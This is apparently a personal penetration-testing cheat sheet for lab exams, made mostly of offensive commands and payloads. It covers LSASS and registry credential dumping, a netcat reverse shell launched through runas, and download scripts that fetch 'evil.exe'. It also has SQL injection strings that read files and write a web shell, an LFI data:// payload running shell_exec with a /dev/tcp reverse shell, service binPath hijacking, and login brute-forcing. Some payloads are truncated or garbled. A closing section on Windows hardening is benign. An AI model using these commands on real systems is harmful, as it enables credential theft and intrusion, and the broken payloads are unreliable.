• https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz procdump.exe -accepteula -ma lsass.exe lsass.dmp // or avoid reading lsass by dumping a cloned lsass process procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

reg

reg save hklm\sam sam reg save hklm\system system reg save hklm\security security

runas

• run command as another user -> will prompt for password runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443"

• run command as a domain user -> will prompt for password runas /netonly /user:<domain name>\<domain username> "mmc /server=<domain controler>"

sc

• Change binary_path_name of service cmd /c "sc config IObitUnSvr binPath= c:\Users\dharding\IObit.exe"

• Start service cmd /c "sc start IObitUnSvr"

• Stop service cmd /c "sc stop IObitUnSvr"

• Query service cmd /c "sc qc IObitUnSvr"

schtask

• list scheduled tasks schtasks /query /fo LIST /v

• list scheduled tasks + grep schtasks /query /fo LIST /v | select-string 'TFTP' -context 10

sherlock

• from a cmd reverse shell

• takes a while to run Append ‘Find-AllVulns’ at the end of Sherlock.ps1 powershell -nop -ep bypass "./Sherlock.ps1"

wget

JS

echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); > wget.js
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
echo WinHttpReq.Send(); >> wget.js
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
echo BinStream.Type = 1; >> wget.js
echo BinStream.Open(); >> wget.js
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
echo BinStream.SaveToFile("out.exe"); >> wget.js

cscript /nologo wget.js http://<ip>/<file>

PowerShell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://$args[0]:$args[1]/$args[2]" >>wget.ps1
echo $file = "$args[2]" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

• oneliner paste

echo $storageDir = $pwd > wget.ps1&echo $webclient = New-Object System.Net.WebClient >>wget.ps1&echo $url = "http://$args[0]/$args[1]" >>wget.ps1&echo $file = "$args[1]" >>wget.ps1&echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

VBS

echo 'strUrl = WScript.Arguments.Item(0)' > wget.vbs
echo 'StrFile = WScript.Arguments.Item(1)' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DIRECT = 1' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PROXY = 2' >> wget.vbs
echo 'Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts' >> wget.vbs
echo 'Err.Clear' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")' >> wget.vbs
echo 'http.Open "GET", strURL, False' >> wget.vbs
echo 'http.Send' >> wget.vbs
echo 'varByteArray = http.ResponseBody' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set fs = CreateObject("Scripting.FileSystemObject")' >> wget.vbs
echo 'Set ts = fs.CreateTextFile(StrFile, True)' >> wget.vbs
echo 'strData = ""' >> wget.vbs
echo 'strBuffer = ""' >> wget.vbs
echo 'For lngCounter = 0 to UBound(varByteArray)' >> wget.vbs
echo 'ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))' >> wget.vbs
echo 'Next' >> wget.vbs
echo 'ts.Close' >> wget.vbs

cscript wget.vbs http://10.11.0.4/evil.exe evil.exe

xcopy

• copy folder recursively

• https://www.devdungeon.com/content/recursively-copy-delete-and-move-directories-windows xcopy /E /H

Cypher Queries

https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

Services

• Active Directory
• Databases
• Kerberos

Active Directory

Kerberos

Databases

MongoDB

crack password from pcap -> check PG Tico

MySQL

• SQLi to LFI

Get current user: utos=%' union select 1,(select user()),3,4,5,6,7,8,9,10,11,12,13,14 --
Check file privileges: utos=%' union select 1,(select group_concat('%0a',file_priv,'%0a') fRoM mysql.user where user='root'),3,4,5,6,7,8,9,10,11,12,13,14 --
utos=%' union select 1,(select to_base64(load_file('C:\xampp\htdocs\discuss\index.php'))),3,4,5,6,7,8,9,10,11,12,13,14 --

• SQLi to RCE utos=%' union select 1,"",3,4,5,6,7,8,9,10,11,12,13,14 into OUTFILE 'C:\xampp\htdocs\back.php' --

• privesc UDF https://www.exploit-db.com/exploits/7856 https://www.exploit-db.com/exploits/46249 (x86) https://www.exploit-db.com/exploits/1518 https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7856.tar.gz

MSSQL

• Nmaprecon sudo proxychains -q nmap -sT -p1433,445,1434 --script 'ms-sql* and not brute' -oN recon/mssql-nmap 172.16.1.5 -vv

Orable

• https://0xdf.gitlab.io/2018/08/04/htb-silo.html
• methodology: https://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

Neo4j

Shares

FTP

• try anonymous
• try login with /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

ftp -A $IP # use active ftp

• recursive download (do not create host directory -nH) wget -nH -r ftp://anonymous:anonymous@$IP:30021

• recursive download active FTP wget -nH -r --no-passive-ftp ftp://anonymous:anonymous@$IP

GlusterFS

https://book.hacktricks.xyz/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs

sudo gluster --remote-host=10.10.11.131 volume list

• This will return the name of the volumes

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/

• Sirol glusterfs privesc https://github.com/MauroEldritch/GEVAUDAN/blob/master/gevaudan.rb

NFS

• Mount NFS share with proxy
• -L local_ip:local_port:remote_ip:remote_port

ssh -L 127.0.0.1:2049:127.0.0.1:2049 sudo mount -t nfs -o port=2049,proto=tcp localhost:/srv/Share nfs_mnt/

sudo proxychains -q nmap -sT -p111,2049 --script 'nfs*' -oN recon/nfs-service 172.16.1.5 -vv

• Check if no_root_squash -> permissions (uid:gid) are checked client side

SMB

• ERRORS (protocol negotiation failed:) add those two line in /etc/samba/smb.conf under [global]

client min protocol = LANMAN1 client max protocol = SMB3

Mail

SMTP

• Enumerate users smtp-user-enum -M VRFY -U users.txt -t $IP

• brute force pop3 login (hydra is unstable) medusa -U users.txt -P cewl_passwords -M pop3 -h $IP

• brute force imap login hydra -L smtp_users.txt -P cewl_passwords imap://$IP -I

POP

--- pop3 server with netcat | Command | Comment | |---------------+-----------------------------------------------| | USER | Your user name for this mail server | | PASS | Your password. | | QUIT | End your session. | | STAT | Number and total size of all messages | | LIST | Message# and size of message | | RETR message# | Retrieve selected message | | DELE message# | Delete selected message | | NOOP | No-op. Keeps you connection open. | | RSET | Reset the mailbox. Undelete deleted messages. |

Enumerate valide users with known password + mail (check oscp beta) #!/bin/bash

pass=1234

for user in marcus john mailadmin jenny ryuu do (echo USER $user; sleep 2s; echo PASS $pass; sleep 2s; echo LIST; sleep 2s; echo QUIT)| ncat -nvC 10.11.1.72 110 done

medusa -U users.txt -P cewl_passwords -M pop3 -h $IP

telnet $IP 110

user pass list # show email list

retr # show content of email

IMAP

Ports

ident 113/tcp

returns which user is running a service on port N

CMS

BigTree

check oscp demo alpha

Drupal

• https://hacktricks.boitatech.com.br/pentesting/pentesting-web/drupal --- user enumeration hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'

--- user enumeration /user/ -> 403 == user exists -> 404 == no user

--- page enumeration /node/

--- droopescan droopescan scan drupal -u 10.10.10.102:80 --- drupalgeddon

Joomla

joomscan -ec -u http://curling.htb

Wordpress

--- wpscan

• SSRF http://10.10.110.100:65000/wordpress/index.php/wp-json/oembed/1.0/proxy?url=http://10.10.14.210

• https://hacktricks.boitatech.com.br/pentesting/pentesting-web/wordpress

HTTP

Grafana

check LFI vuln

IIS

• check index. • check default.

Jenkins

• https://book.hacktricks.xyz/cloud-security/jenkins
• https://github.com/gquere/pwn_jenkins

Check version leak: http://172.16.1.19:8080/oops http://172.16.1.19:8080/whoAmI/ /api/json?pretty=true /asynchPeople/api/xml?depth=1 # list of users

/securityRealm/createAccount -> SecLists Web-Content -> Jenkins

Kibana / Elasticsearch

• check PG Sirol https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2 RCE vulnerability in 2019 for Kibana versions < 6.6.0 https://github.com/Cr4ckC4t/cve-2019-7609

• get kibana version ->

log in kibana dashboard -> Dev Tools -> Console change query to "GET /"

Obfuscated JavaScript

http://www.jsnice.org http://codeamaze.com/code-beautifier/javascript-deobfuscator (oscp gh0st)

PHP

• With LFI/RFI -> check filters GET /section.php?page=data://text/plain;base64, HTTP/1.1 http://192.168.104.53:8080/site/index.php?page=data://text/plain,%3C?php%20echo%20shell_exec(%22whoami%22);%20?%3E GET /section.php?page=data://text/plain;base64,& /dev/tcp/192.168.119.235/443 0>&1"); ?> HTTP/1.1

• php filters http://192.168.243.58/image.php?img=php://filter/convert.base64-encode/resource=/proc/self/cwd/image.php

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-data

RedMine

default login: admin:admin

RCE -> CVE-2019-18890 3.2.9 and 3.3.x before 3.3.10

Tomcat

WAF

https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c

check PG/xposedapi

• X-Originating-IP: 127.0.0.1 • X-Forwarded-For: 127.0.0.1 • X-Remote-IP: 127.0.0.1 • X-Remote-Addr: 127.0.0.1

WebDav

• cadaver
• davtest (check extension upload)

davtest -url http://$IP -auth 'fmcsorley:CrabSharkJellyfish192'

cadaver $IP

XAMPP

--- With LFI C:\xampp\mysql\bin\my.ini C:\xampp\phpmyadmin\config.inc.php

IM

IRC

• connect to server
• list users
• list channels
• look for messages?

Message Queue

https://book.hacktricks.xyz/network-services-pentesting/5671-5672-pentesting-amqp https://book.hacktricks.xyz/network-services-pentesting/15672-pentesting-rabbitmq-management https://book.hacktricks.xyz/network-services-pentesting/1883-pentesting-mqtt-mosquitto

https://book.hacktricks.xyz/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce -> PG/Clyde

https://www.exploit-db.com/exploits/49418

SNMP

snmp-check <- very nice tool

SSH

• bitvise ssh server for windows

Terminal initialization failure. See server logs for more info.
Hint: Try requesting a different terminal environment.
Connection to 192.168.206.179 closed.

Solution: ssh -i ~/.ssh/dvr4_viewer_key viewer@$IP "cmd"

Proxy

Forward Socks Proxy

ssh -D <port>

Reverse Socks Proxy

ssh -R <port>

Port Forwarding

Local Port Forwarding

Remote Port Forwarding

SMB

proxychains -q enum4linux -a -u "" -p "" 172.16.1.20 proxychains -q enum4linux -a -u "guest" -p "" 172.16.1.20

proxychains -q smbmap -u "" -p "" -P 445 -H 172.16.1.20 proxychains -q smbmap -u "guest" -p "" -P 445 -H 172.16.1.20

smbclient -U '%' -L //172.16.1.20 smbclient -U ‘guest' -L //172.16.1.20

LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 172.16.1.20

VoIP

https://github.com/trustedsec/SeeYouCM-Thief

https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/

https://www.cisco.com/c/en/us/support/docs/unified-communications/unified-communications-manager-callmanager/200408-Retrieve-Phone-Configuration-File-from-T.html

Check for files on TFTP server

• ConfigFileCacheList.txt
• SEP.cnf.xml
• SIPDefault.cnf
• XMLDefault.cnf.xml

Hosting

iptables

DIY portquiz.net

# /etc/iptables/rules.v4
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A PREROUTING -i lo -j RETURN
-A PREROUTING -p icmp -j RETURN
-A PREROUTING -m state --state RELATED,ESTABLISHED -j RETURN
-A PREROUTING -p tcp -j DNAT --to-destination :8888
COMMIT

*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state NEW -m tcp --dport 8888 -j ACCEPT
-A INPUT -j DROP
COMMIT

# /etc/xinetd.d/alive
service simple-tcp
{
    disable         = no
    type            = UNLISTED
    id              = tcp-service
    socket_type     = stream
    port            = 8888
    protocol        = tcp
    user            = nobody
    wait            = no
    server          = /bin/echo
    server_args     = Alive!
    instances       = 25
    log_on_success  += DURATION HOST
    log_on_failure  += ATTEMPT HOST
    per_source      = 5
    flags           = IPv4
}
EOF

Apache

Nginx

System Configuration

Windows

Enable Sysmon

• sysmon-config Run as admin: sysmon.exe -accepteula -c sysmonconfig-export-block.xml

Disable Legacy DNS

• Disable mDNS

New-Item "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT" -Name DNSClient -ErrorAction SilentlyContinue 
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name EnableMultiCast -Value 0 -PropertyType DWORD -Force

• Disable LLMNR

New-Item "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT" -Name DNSClient -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name DisableSmartNameResolution -Value 0 -PropertyType DWORD -Force

• Disable NetBIOS on all network interfaces

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey `
    | ForEach-Object {Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

Disable WPAD (Proxy Discovery)

New-Item "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\" -Name WinHttp -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\" -Name "DisableWpad" -Value 4 -PropertyType DWORD -Force

Disable IPv6 on all interfaces

Get-NetAdapterBinding `
    | Where-Object {$_.ComponentID -EQ 'ms_tcpip6' -and $_.Enabled -EQ 'False'} `
    | ForEach-Object {Disable-NetAdapterBinding -Name $_.Name -ComponentID 'ms_tcpip6' -ErrorAction SilentlyContinue -Verbose; Start-Sleep -Seconds 3}

Enable Virtualization Based Security

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard
New-Item "HKLM:\SYSTEM\CurrentControlSet\Control\" -Name DeviceGuard -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType DWORD -Value 1 -Force

Enable Windows Defender Credential Guard

New-Item "HKLM:\SYSTEM\CurrentControlSet\Control\" -Name Lsa -ErrorAction SilentlyContinue
New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LsaCfgFlags" -PropertyType DWORD -Value 2 -Force

Hardware

Raspberry Pi

Builtin power on/off button

• Connect a button to pin 5 and ground to issue a soft shutdown.

[pi4]
dtparam=i2c_arm=off
dtoverlay=gpio-shutdown,gpio_pin=3,active_low=1